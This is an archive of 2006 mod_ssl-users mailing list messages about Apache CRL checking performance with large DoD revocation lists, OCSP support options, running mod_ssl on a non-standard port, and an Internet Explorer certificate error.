X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from talk.nabble.com (www.nabble.com [72.21.53.35])
	by master.modssl.org (Postfix) with ESMTP id 5CD9814D847
	for ; Wed, 11 Oct 2006 22:42:49 +0200 (CEST)
Received: from [72.21.53.38] (helo=jubjub.nabble.com)
	by talk.nabble.com with esmtp (Exim 4.50)
	id 1GXkuS-0006Dj-Vn
	for modssl-users@modssl.org; Wed, 11 Oct 2006 13:42:36 -0700
Message-ID: <6764331.post@talk.nabble.com>
Date: Wed, 11 Oct 2006 13:42:36 -0700 (PDT)
From: pbains 
To: modssl-users@modssl.org
Subject: RE: CRL Checking Uses Excessive Memory
In-Reply-To: <8B3BECEEF7677D4F96CC9C9E2AB9DE7D02B7DDE2@emswhl1.pac.disa.mil>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Nabble-From: paul.opensource@gmail.com
References: <3727C3C729EAA545A6E97E420BCF649E015D5225@fskrsm24.hill.afmc.ds.af.mil> <20060421211103.GA2073@ligo.caltech.edu> <8B3BECEEF7677D4F96CC9C9E2AB9DE7D02B7DDDF@emswhl1.pac.disa.mil> <8B3BECEEF7677D4F96CC9C9E2AB9DE7D02B7DDE2@emswhl1.pac.disa.mil>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: pbains 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I am working on a DoD project, and we are experiencing high CPU load on HP-UX
servers with multiple CPUs in this scenario. We are thinking it is because
the CRL size for some CAs is huge - ad-hoc tests done with certs associated
with small CRLs do not produce CPU spikes, but large CRLs do. We are running
an older version of Apache and the mod_ssl package without OCSP support, but
have just installed an updated Apache with mod_ssl and OCSP support. Anyone
using this, and if so, have any luck with it? Thanks in advance!

Paul


Victor, Dwight P CTR DISA PAC wrote:
> 
> Hi Rob,
> 
> I also work for the DoD and am using the same CRLs as you (downloaded and
> converted on a daily basis).  We're running a Linux webserver with a
> single
> 1.8Ghz Celeron, 512MB of RAM, and 1GB of swap.
> 
> I haven't noticed any memory issues when checking CRLs.
> 
> My Apache server starts multiple child servers.  It looks like the child
> servers hit around 60MB of memory usage (max) when processing CRL checks;
> 500KB to 1MB seems to be the average child server's memory usage when
> idle.
> 
> top says my current load average is about 0.03, 0.01, 0.00.  When checking
> CRLs, top says my load average zooms up to around 0.20, 0.05, 0.01.
> 
> Of course, my userbase is very small and we aren't doing a ton of CRL
> checks.
> 
> OCSP should resolve your issue with plowing through the CRLs, however, I
> have yet to find a viable OCSP solution.  There was a patch for mod_ssl,
> but
> I haven't heard anything about it since it was last released in 2004. 
> Maybe
> someone else on this list knows?
> 
> Rob, why don't you email me offline.  I'm in the DISA GAL, if you can get
> to
> that.
> 
> Dwight...
> 
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Walls Rob W Contr 75
> CS/SCBS
> Sent: Friday, April 21, 2006 10:47 AM
> To: 'modssl-users@modssl.org'
> Subject: CRL Checking Uses Excessive Memory
> 
> 
> I work for the DoD. We have about a dozen CA's with their own CRL files.
> Some of these are over 20M in size. When CRL checking is enabled in Apache
> (for Linux or Windows), memory use is excessive and httpd processes are
> killed by the OS (Linux) due to out of memory conditions and all the
> memory
> swapping activity sends the proc utilization way up there and makes the
> server unresponsive. On Windows the CPU use just pegs at 100% (I have no
> idea what else is going on in there).
> CRL's are downloaded every day and openssl is used to make hash'd file
> names
> (ssl.conf is using  SSLCARevocationPath). I don't currently restart apache
> after retrieving the new CRL files.
> The Linux machine runs redhat with dual 3ghz xeons and 2Gb ram. SSL works
> great, but as soon as CRLs are checked, apache starts to go south! I have
> a
> 2Gb swap partition and have added another 2Gb swap file to at least keep
> things running, but it becomes so slow it might as well crash.
> Each httpd process goes from using about 14Mb of memory when not CRL
> checking to 250Mb when CRL checking is enabled!
> BTW: anywhere from 10 to 20 concurrent httpd processes are normal for that
> machine.
> 
> Any ideas on how to use large CRL's in Apache? 
> 
> Do I just need more memory?
> 
> If Apache can't use many large CRL files, would an OSCP solution side-step
> these problems? Any good ones out there?
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> 

-- 
View this message in context: http://www.nabble.com/CRL-Checking-Uses-Excessive-Memory-tf1488925.html#a6764331
Sent from the mod_ssl - Users mailing list archive at Nabble.com.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 11 22:44:37 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B7AB214D9E1; Wed, 11 Oct 2006 22:44:37 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail13.ca.com (mail13.ca.com [141.202.248.42])
	by master.modssl.org (Postfix) with ESMTP id 45B4214D87B
	for ; Wed, 11 Oct 2006 22:44:36 +0200 (CEST)
Received: from USILMS12.ca.com ([141.202.201.12]) by mail13.ca.com with Microsoft SMTPSVC(6.0.3790.1830);
	 Wed, 11 Oct 2006 16:44:20 -0400
x-mimeole: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: OCSP? (UNCLASSIFIED)
Date: Wed, 11 Oct 2006 16:44:19 -0400
Message-ID: <2629CC4E1D22A64593B02C43E8555303014E8133@USILMS12.ca.com>
in-reply-to: <6764147.post@talk.nabble.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: OCSP? (UNCLASSIFIED)
Thread-Index: AcbtdFbLzhnaiMa9T4SAnMtViBFAqwAAJ0lw
From: "Richters, Eriks A" 
To: 
X-OriginalArrivalTime: 11 Oct 2006 20:44:20.0186 (UTC) FILETIME=[06C0CBA0:01C6ED76]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Richters, Eriks A" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I went down this road a few months ago.  Someone wrote a patch that
would add OCSP client functionality to Apache, but the patch never got
folded into the Apache mainline code.  We spent a bit of effort trying
to get the patch to work with our version of Apache with no luck.
There are two products from commercial organizations out there that can
help.  One is from Tumbleweed, called Server Validator.  It's pricey
about $2000 per server, but works pretty well. Its very easy to install
and configure and has some nice features for supporting OCSP and failing
over to CRLs.  It is supported on several platforms. =20
The other product is called WebCullis from the organization that used to
be Orion Security. (Orion Security has since been bought by Entrust.)
It used to be under the GPL, which was nice.  At the time, they only had
a version for Windows and Intel based Solaris.=20
I hope this helps.=20

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of pbains
Sent: Wednesday, October 11, 2006 4:32 PM
To: modssl-users@modssl.org
Subject: Re: OCSP? (UNCLASSIFIED)


My organization is headed down this road after experiencing performance
degradation from checking large CRLs. As we come up with a solution,
will
post what I find out. Alternatively, if you have any information, would
appreciate it, thanks!

Paul


Victor, Dwight P CTR DISA PAC wrote:
>=20
> Classification:  UNCLASSIFIED=20
> Caveats: NONE
>=20
>=20
> Hello List!
>=20
> Has anyone had any experience/success with using mod_ssl + Apache v2
to
> query an OCSP responder regarding the status of an end-user provided
> certificate and allow/deny access based on the response?  Any tips,
> suggestions, discussion would be appreciated.
>=20
> Best Regards,
>=20
> Dwight...
>=20
> ---
> Dwight Victor, CISSP (Contractor)
> Systems Administrator / Webmaster
> General Dynamics C4 Systems
> EMAIL: dwight.victor.ctr@disa.mil
> TEL:   (808) 653-3677 ext 229
>=20
> Classification:  UNCLASSIFIED=20
> Caveats: NONE
>=20
>=20
> =20
>=20

--=20
View this message in context:
http://www.nabble.com/OCSP--%28UNCLASSIFIED%29-tf1638361.html#a6764147
Sent from the mod_ssl - Users mailing list archive at Nabble.com.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 11 22:55:21 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B9BCA14D887; Wed, 11 Oct 2006 22:55:21 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from talk.nabble.com (www.nabble.com [72.21.53.35])
	by master.modssl.org (Postfix) with ESMTP id 2D38314D847
	for ; Wed, 11 Oct 2006 22:55:18 +0200 (CEST)
Received: from [72.21.53.38] (helo=jubjub.nabble.com)
	by talk.nabble.com with esmtp (Exim 4.50)
	id 1GXl6Y-0002ie-OH
	for modssl-users@modssl.org; Wed, 11 Oct 2006 13:55:06 -0700
Message-ID: <6764600.post@talk.nabble.com>
Date: Wed, 11 Oct 2006 13:55:06 -0700 (PDT)
From: pbains 
To: modssl-users@modssl.org
Subject: RE: OCSP? (UNCLASSIFIED)
In-Reply-To: <2629CC4E1D22A64593B02C43E8555303014E8133@USILMS12.ca.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Nabble-From: paul.opensource@gmail.com
References: <8B3BECEEF7677D4F96CC9C9E2AB9DE7D02B7DEA3@emswhl1.pac.disa.mil> <6764147.post@talk.nabble.com> <2629CC4E1D22A64593B02C43E8555303014E8133@USILMS12.ca.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: pbains 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Thanks Eriks, appreciate the info. We are using HP-UX, so the Tumbleweed
solution won't work for us. We do have an HP version of Apache that has the
OCSP mod of mod_ssl, but we just installed it (today) and haven't had a
chance to look at the documentation yet. Will post back and let you know
what we found out. Thanks again.

Paul


Richters, Eriks A wrote:
> 
> I went down this road a few months ago.  Someone wrote a patch that
> would add OCSP client functionality to Apache, but the patch never got
> folded into the Apache mainline code.  We spent a bit of effort trying
> to get the patch to work with our version of Apache with no luck.
> There are two products from commercial organizations out there that can
> help.  One is from Tumbleweed, called Server Validator.  It's pricey
> about $2000 per server, but works pretty well. Its very easy to install
> and configure and has some nice features for supporting OCSP and failing
> over to CRLs.  It is supported on several platforms.  
> The other product is called WebCullis from the organization that used to
> be Orion Security. (Orion Security has since been bought by Entrust.)
> It used to be under the GPL, which was nice.  At the time, they only had
> a version for Windows and Intel based Solaris. 
> I hope this helps. 
> 
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of pbains
> Sent: Wednesday, October 11, 2006 4:32 PM
> To: modssl-users@modssl.org
> Subject: Re: OCSP? (UNCLASSIFIED)
> 
> 
> My organization is headed down this road after experiencing performance
> degradation from checking large CRLs. As we come up with a solution,
> will
> post what I find out. Alternatively, if you have any information, would
> appreciate it, thanks!
> 
> Paul
> 
> 
> Victor, Dwight P CTR DISA PAC wrote:
>> 
>> Classification:  UNCLASSIFIED 
>> Caveats: NONE
>> 
>> 
>> Hello List!
>> 
>> Has anyone had any experience/success with using mod_ssl + Apache v2
> to
>> query an OCSP responder regarding the status of an end-user provided
>> certificate and allow/deny access based on the response?  Any tips,
>> suggestions, discussion would be appreciated.
>> 
>> Best Regards,
>> 
>> Dwight...
>> 
>> ---
>> Dwight Victor, CISSP (Contractor)
>> Systems Administrator / Webmaster
>> General Dynamics C4 Systems
>> EMAIL: dwight.victor.ctr@disa.mil
>> TEL:   (808) 653-3677 ext 229
>> 
>> Classification:  UNCLASSIFIED 
>> Caveats: NONE
>> 
>> 
>>  
>> 
> 
> -- 
> View this message in context:
> http://www.nabble.com/OCSP--%28UNCLASSIFIED%29-tf1638361.html#a6764147
> Sent from the mod_ssl - Users mailing list archive at Nabble.com.
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> 

-- 
View this message in context: http://www.nabble.com/OCSP--%28UNCLASSIFIED%29-tf1638361.html#a6764600
Sent from the mod_ssl - Users mailing list archive at Nabble.com.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 11 23:16:58 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5AE2514D887; Wed, 11 Oct 2006 23:16:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mtawhl2.disanet.disa-u.mil (mtawhl2.pac.disa.mil [198.22.28.4])
	by master.modssl.org (Postfix) with ESMTP id 283A714D847
	for ; Wed, 11 Oct 2006 23:16:54 +0200 (CEST)
Received: by mtawhl2.pac.disa.mil with Internet Mail Service (5.5.2657.72)
	id <4GRDS38F>; Wed, 11 Oct 2006 11:16:36 -1000
Message-ID: <8B3BECEEF7677D4F96CC9C9E2AB9DE7D02B7E0C4@emswhl1.pac.disa.mil>
From: "Victor, Dwight P CTR DISA PAC" 
To: "'modssl-users@modssl.org'" 
Subject: RE: OCSP? (UNCLASSIFIED)
Date: Wed, 11 Oct 2006 11:16:32 -1000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2657.72)
Content-Type: text/plain
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Victor, Dwight P CTR DISA PAC" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Classification:  UNCLASSIFIED 
Caveats: NONE

Hi Eriks,

Thanks for the tip regarding Tumbleweed & WebCullis.  I'll definitely have
to do some research.

Paul,

One of my web searches pulled up the fact that HP-UX has a OCSP enabled
version of mod_ssl.  Seems to be a lucky break for you.  Hope that works
out.

I have experienced a large memory hit anytime certificate checking is
performed against the CRLs (some of which are 13 MB in size) in the range of
75MB per Apache server instance.  Luckily we aren't that busy, or we would
definitely be feeling the pain.

BTW, I've been reading a bit about mod_nss
(http://directory.fedora.redhat.com/wiki/Mod_nss).  This module sounds
interesting, but it isn't supported on HP-UX.  I'll have to give it a try
and I'll let the list know the results (if I can find some time to play with
it).
Thanks again,

Dwight...

---
Dwight Victor, CISSP (Contractor)
EMAIL: dwight.victor.ctr@disa.mil
SMAIL: victord@pac.disa.smil.mil
TEL:   (808) 653-3677 ext 229

-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] 
Sent: Wednesday, October 11, 2006 10:55 AM
To: modssl-users@modssl.org
Subject: RE: OCSP? (UNCLASSIFIED)


Thanks Eriks, appreciate the info. We are using HP-UX, so the Tumbleweed
solution won't work for us. We do have an HP version of Apache that has the
OCSP mod of mod_ssl, but we just installed it (today) and haven't had a
chance to look at the documentation yet. Will post back and let you know
what we found out. Thanks again.

Paul


Richters, Eriks A wrote:
> 
> I went down this road a few months ago.  Someone wrote a patch that 
> would add OCSP client functionality to Apache, but the patch never got 
> folded into the Apache mainline code.  We spent a bit of effort trying 
> to get the patch to work with our version of Apache with no luck.
> There are two products from commercial organizations out there that 
> can help.  One is from Tumbleweed, called Server Validator.  It's 
> pricey about $2000 per server, but works pretty well. Its very easy to 
> install and configure and has some nice features for supporting OCSP 
> and failing over to CRLs.  It is supported on several platforms.
> The other product is called WebCullis from the organization that used 
> to be Orion Security. (Orion Security has since been bought by 
> Entrust.) It used to be under the GPL, which was nice.  At the time, 
> they only had a version for Windows and Intel based Solaris.
> I hope this helps. 
> 
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of pbains
> Sent: Wednesday, October 11, 2006 4:32 PM
> To: modssl-users@modssl.org
> Subject: Re: OCSP? (UNCLASSIFIED)
> 
> 
> My organization is headed down this road after experiencing 
> performance degradation from checking large CRLs. As we come up with a 
> solution, will post what I find out. Alternatively, if you have any 
> information, would appreciate it, thanks!
> 
> Paul
> 
> 
> Victor, Dwight P CTR DISA PAC wrote:
>> 
>> Classification:  UNCLASSIFIED
>> Caveats: NONE
>> 
>> 
>> Hello List!
>> 
>> Has anyone had any experience/success with using mod_ssl + Apache v2
> to
>> query an OCSP responder regarding the status of an end-user provided 
>> certificate and allow/deny access based on the response?  Any tips, 
>> suggestions, discussion would be appreciated.
>> 
>> Best Regards,
>> 
>> Dwight...
>> 
>> ---
>> Dwight Victor, CISSP (Contractor)
>> Systems Administrator / Webmaster
>> General Dynamics C4 Systems
>> EMAIL: dwight.victor.ctr@disa.mil
>> TEL:   (808) 653-3677 ext 229
>> 
>> Classification:  UNCLASSIFIED
>> Caveats: NONE
>> 
>> 
>>  
>> 
> 
> --
> View this message in context:
> http://www.nabble.com/OCSP--%28UNCLASSIFIED%29-tf1638361.html#a6764147
> Sent from the mod_ssl - Users mailing list archive at Nabble.com.
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> 

--
View this message in context:
http://www.nabble.com/OCSP--%28UNCLASSIFIED%29-tf1638361.html#a6764600
Sent from the mod_ssl - Users mailing list archive at Nabble.com.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
Classification:  UNCLASSIFIED 
Caveats: NONE

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 11 23:32:08 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E871914D887; Wed, 11 Oct 2006 23:32:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nz-out-0102.google.com (nz-out-0102.google.com [64.233.162.194])
	by master.modssl.org (Postfix) with ESMTP id 68F2614D847
	for ; Wed, 11 Oct 2006 23:32:07 +0200 (CEST)
Received: by nz-out-0102.google.com with SMTP id j2so171189nzf
        for ; Wed, 11 Oct 2006 14:31:55 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type;
        b=FQgFWM2fR/dOAmzQRAWgA4i7l7FzKw4Kpt8lAVZ8pBKJ4QVhC5in8Ur6xlEBGMeSCVVAuVXzihP5cV6hs7JHDDnDtbQkMMSbjpVdpwxruqzaeLvRJTUzJEZRCRUNxl8GSBtImku2ibdgcEGOWRdKPqTA7pDbDnOtd5ZkXf2GXlw=
Received: by 10.65.191.7 with SMTP id t7mr1510472qbp;
        Wed, 11 Oct 2006 14:31:54 -0700 (PDT)
Received: by 10.65.218.14 with HTTP; Wed, 11 Oct 2006 14:31:54 -0700 (PDT)
Message-ID: <740f716a0610111431u6cb4d11mc39cf370b7b09a59@mail.gmail.com>
Date: Wed, 11 Oct 2006 14:31:54 -0700
From: "Yvo van Doorn" 
To: modssl-users@modssl.org
Subject: Having modssl run on different ports, is this even possible?
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_34482_27282275.1160602314321"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Yvo van Doorn" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_34482_27282275.1160602314321
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

I am running Apache2 with the included mod_ssl module, I figure this a good
place to start, but if it belongs on the apache httpd mailing list you can
bluntly tell me.

The servers I administer run in an environment that is pretty painful, but
common i hear. Another team at corporate headquarters administer the
firewall and what they are planning to do is as follows. I have no control
over the firewall what so ever.

Any port 80 (http) request sent to the firewall for domain
www.example.comwill be then rerouted to an internal IP, such as
172.16.15.102 (behind the firewall), on port 8000. Thus I have apache
listening on port 8000.

Any port 443 (https) request sent to the firewall for domain
www.example.comwill be then rerouted to to an internal IP, such as
172.16.15.102 (behind the firewall), on port 9000. I want to have mod_ssl
listening on port 9000, is this possible?

Should a virtualhost entry just work such 
and have the usual items such as SSLEngine, SSLCertificateFile,
SSLCertificateKeyFile, etc?

Any help is appreciated.

Yvo

------=_Part_34482_27282275.1160602314321
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

I am running Apache2 with the included mod_ssl module, I figure this a good place to start, but if it belongs on the apache httpd mailing list you can bluntly tell me.

The servers I administer run in an environment that is pretty painful, but common i hear. Another team at corporate headquarters administer the firewall and what they are planning to do is as follows. I have no control over the firewall what so ever.


Any port 80 (http) request sent to the firewall for domain www.example.com will be then rerouted to an internal IP, such as 172.16.15.102 (behind the firewall), on port 8000. Thus I have apache listening on port 8000.


Any port 443 (https) request sent to the firewall for domain www.example.com will be then rerouted to to an internal IP, such as 172.16.15.102
 (behind the firewall), on port 9000. I want to have mod_ssl listening on port 9000, is this possible?

Should a virtualhost entry just work such <VirtualHost 172.16.15.102:9000
> and have the usual items such as SSLEngine, SSLCertificateFile, SSLCertificateKeyFile, etc?

Any help is appreciated. 

Yvo


------=_Part_34482_27282275.1160602314321--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 12 00:28:46 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 05F5C14D893; Thu, 12 Oct 2006 00:28:45 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from relais.videotron.ca (relais.videotron.ca [24.201.245.36])
	by master.modssl.org (Postfix) with ESMTP id 788BE14D847
	for ; Thu, 12 Oct 2006 00:28:44 +0200 (CEST)
Received: from avril.internal.test ([66.131.181.208])
 by VL-MO-MR003.ip.videotron.ca
 (Sun Java System Messaging Server 6.2-2.05 (built Apr 28 2005))
 with SMTP id <0J6Z003FZT3JAN20@VL-MO-MR003.ip.videotron.ca> for
 modssl-users@modssl.org; Wed, 11 Oct 2006 18:28:32 -0400 (EDT)
Received: (qmail 29795 invoked from network); Wed, 11 Oct 2006 22:28:31 +0000
Received: from unknown (HELO ?192.168.42.128?) (192.168.42.128)
 by avril.internal.test with SMTP; Wed, 11 Oct 2006 22:28:31 +0000
Date: Wed, 11 Oct 2006 18:25:53 -0400
From: Patrick Patterson 
Subject: Re: Encrypted page would not load into IE
In-reply-to: <2629CC4E1D22A64593B02C43E855530301480D8B@USILMS12.ca.com>
To: modssl-users@modssl.org
Message-id: <200610111825.54190.ppatterson@carillonis.com>
Organization: Carillon Information Security Inc.
MIME-version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 7BIT
Content-disposition: inline
References: <2629CC4E1D22A64593B02C43E855530301480D8B@USILMS12.ca.com>
User-Agent: KMail/1.9.4
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Patrick Patterson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Micheal:

Are you able to post the certificate here? It sounds like the issue may be the 
key usage, or an entry in some other field - I've seen results like this if 
you don't have key agreement set, or some of the other fields mangled, or 
particular security settings enabled in your certificate.

Patrick.


On Tuesday 10 October 2006 10:20, Richters, Eriks A wrote:
> This definitly sounds like an IE problem.  Check MSDN,
> http://msdn.microsoft.com.
> If you can't find anything there, then contact MicroSoft Support.
> Unfortunately, unless you're a large corporation, its hard to get good
> support from them.
>
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org] On Behalf Of Michael Pacey
> Sent: Tuesday, October 10, 2006 6:40 AM
> To: modssl-users@modssl.org
> Subject: Re: Encripted page would not load into IE
>
> Hmmm, sorry I'm not an IE expert but it sounds like you are at least on
> the right track. Maybe check on an IE list or forum?
>
> BB said:
> > Sorry, my mistake. The CA shows up in the list, but I get still the
>
> same
>
> > error.
> >
> >> I tried also to install the certificate of the CA in the Trusted Root
> >> Certification Authorities folder. It says Import Successfull, but my
>
> CA
>
> >> doesn't show up in the list.
> >>
> >> Any hints?
> >>
> >>> Apparently, it's someting wrong with the certificates, as IE Watch
> >>> gets:
> >>>
> >>> ERROR_INTERNET_SEC_INVALID_CERT
> >>>
> >>> What could this be? Firefox works just fine with these certs.
> >>> Additionaly,
> >>> pop3s and imaps from Dovecot work fine with the same certs, even
>
> with
>
> >>> MS
> >>> Outlook and Outlook Express clients.
> >>>
> >>> It's a self created CA, with self signed certificates.
> >>>
> >>> Any suggestions for what should I check further?
> >>>
> >>> Thank you in advance!
> >>>
> >>> BBR
> >>>
> >>>> BB said:
> >>>>> I made the tests with IE from at least 4 different computers,
>
> located
>
> >>>>> in
> >>>>> networks from 3 different ISP's.
> >>>>>
> >>>>> Yes, the connection is done, because ith shows up instantly with
> >>>>> tail -f /var/log/apache/ssl_engine_log
> >>>>
> >>>> Sounds weird. You could try installing an HTTP capture tool like IE
> >>>> Watch
> >>>> and seeing if that gives any useful info.
> >>>>
> >>>> --
> >>>> Michael Pacey
>
> ______________________________________________________________________
>
> >>>> Apache Interface to OpenSSL (mod_ssl)
>
> www.modssl.org
>
> >>>> User Support Mailing List
>
> modssl-users@modssl.org
>
> >>>> Automated List Manager
>
> majordomo@modssl.org
>
>
>
>
> ______________________________________________________________________
>
> >>> Apache Interface to OpenSSL (mod_ssl)
>
> www.modssl.org
>
> >>> User Support Mailing List
>
> modssl-users@modssl.org
>
> >>> Automated List Manager
>
> majordomo@modssl.org
>
>
>
>
> ______________________________________________________________________
>
> >> Apache Interface to OpenSSL (mod_ssl)
>
> www.modssl.org
>
> >> User Support Mailing List
>
> modssl-users@modssl.org
>
> >> Automated List Manager
>
> majordomo@modssl.org
>
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org

-- 
Patrick Patterson
President and Chief PKI Architect
Carillon Information Security Inc.
http://www.carillon.ca
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 12 01:27:29 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 77D2714D9E0; Thu, 12 Oct 2006 01:27:29 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.ukfsn.org (s2.ukfsn.org [217.158.120.143])
	by master.modssl.org (Postfix) with ESMTP id 3220014D9D9
	for ; Thu, 12 Oct 2006 01:27:28 +0200 (CEST)
Received: from [10.0.0.6] (unknown [87.127.67.22])
	by mail.ukfsn.org (Postfix) with ESMTP id 1AA0DE7179
	for ; Thu, 12 Oct 2006 00:26:39 +0100 (BST)
Subject: Re: Having modssl run on different ports, is this even possible?
From: Michael Pacey 
To: modssl-users@modssl.org
In-Reply-To: <740f716a0610111431u6cb4d11mc39cf370b7b09a59@mail.gmail.com>
References: <740f716a0610111431u6cb4d11mc39cf370b7b09a59@mail.gmail.com>
Content-Type: text/plain
Date: Thu, 12 Oct 2006 00:23:41 +0100
Message-Id: <1160609022.5501.14.camel@gandalf>
Mime-Version: 1.0
X-Mailer: Evolution 2.6.1 
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Michael Pacey 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, 2006-10-11 at 14:31 -0700, Yvo van Doorn wrote:
> I am running Apache2 with the included mod_ssl module, I figure this a
> good place to start, but if it belongs on the apache httpd mailing
> list you can bluntly tell me.
> 
> The servers I administer run in an environment that is pretty painful,
> but common i hear. Another team at corporate headquarters administer
> the firewall and what they are planning to do is as follows. I have no
> control over the firewall what so ever. 
> 
> Any port 80 (http) request sent to the firewall for domain
> www.example.com will be then rerouted to an internal IP, such as
